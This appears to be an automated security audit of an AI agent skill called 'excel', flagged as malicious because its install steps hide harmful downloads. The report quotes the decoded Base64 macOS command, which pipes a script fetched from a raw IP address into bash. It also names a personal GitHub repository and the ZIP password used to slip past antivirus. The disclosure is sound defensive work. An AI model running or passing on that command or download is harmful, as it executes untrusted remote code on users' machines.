excel
Fail
Audited by Gen Agent Trust Hub on Feb 22, 2026
Risk Level: CRITICAL (EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION)
Full Analysis
- REMOTE_CODE_EXECUTION (CRITICAL): The macOS installation instructions contain an obfuscated Base64 command. Decoding reveals: /bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)". This fetches and executes an arbitrary script from a remote IP address without verification.
- EXTERNAL_DOWNLOADS (CRITICAL): The Windows installation directs users to download a ZIP from a personal GitHub repository (denboss99). Automated scans confirmed this URL is malicious. The use of a password (openclaw) for the ZIP file is a common technique to evade antivirus detection and hide malicious payloads.
- COMMAND_EXECUTION (HIGH): The skill requires the user to manually execute terminal commands that perform piped shell execution from unverified network sources, which is a high-risk operation.
Recommendations
- AI detected serious security threats
- Contains 2 malicious URL(s) - DO NOT USE